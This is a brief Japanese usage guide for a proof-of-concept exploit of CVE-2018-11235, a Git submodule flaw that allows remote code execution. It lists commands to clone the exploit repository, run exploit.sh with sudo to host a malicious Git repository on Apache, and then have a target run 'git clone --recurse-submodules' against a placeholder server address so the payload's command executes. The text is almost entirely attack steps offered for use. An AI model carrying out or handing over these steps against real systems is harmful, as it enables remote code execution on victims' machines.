
CVE-2018-11235 のエクスプロイト PoC
sshで接続します。git clone https://github.com/Rezy-Dev/CVE-2018-11235
cd CVE-2018-11235
exploit.shに実行権限(x)を付与し、実行します:sudo chmod +x exploit.sh
sudo ./exploit.sh
アパッチ2をダウンロードし、悪意のあるリポジトリを構築します。
http://vps-ip/malicious.git をgitリポジトリとして使用できます。git clone --recurse-submodules http://vps-ip/malicious.git
ペイロードのRCEコマンドが実行されるはずです。
ありがとうございます!